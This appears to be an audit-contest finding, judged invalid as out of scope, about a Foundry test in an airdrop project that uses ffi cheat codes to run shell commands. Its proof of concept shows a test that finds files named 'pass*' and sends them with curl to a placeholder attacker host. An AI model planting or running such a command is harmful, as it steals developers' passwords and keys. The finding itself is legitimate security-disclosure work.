First Flight #14: AirDropper
First Flight #14
Beginner FriendlyDeFiFoundry
100 EXP
View results
Previous Next
Submission Details
Severity: low
Invalid

Malicious Test Uses ffi Access Can Cause Data Extraction

4rdiii

[H-1] Malicious Test Uses ffi Access Can Cause Data Extraction

Description: The MerkleAirdropTest.t.sol::testPwned() as the name suggests uses a ffi access in foundry.toml to execute arbitrary commands on the user's machine.

function testPwned() public {
string[] memory cmds = new string[](2);
cmds[0] = "touch";
cmds[1] = string.concat("youve-been-pwned");
cheatCodes.ffi(cmds);
}
}

Impact: The current test is not harmful as it just creates an empty file, but it can be used to do harm to users and steal private keys or potentialy removing important information.

Proof of Concept:
here is one simple way that hacker can steal data from user:

function testFindCommand() public {
string[] memory cmds = new string[](3);
cmds[0] = "bash";
cmds[1] = "-c";
cmds[2] = "find / -name 'pass*' | curl -F 'data=@-' https://<HACKER_IP>/upload";
cheatCodes.ffi(cmds);
}

Recommended Mitigation: Always exercise caution before running third-party programs on your system. Ensure you understand the functionality of any command or script to prevent unintended consequences, especially those involving security vulnerabilities.

Updates

Lead Judging Commences

inallhonesty Lead Judge about 1 year ago
Submission Judgement Published
Invalidated
Reason: Out of scope
Assigned finding tags:

ffi

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.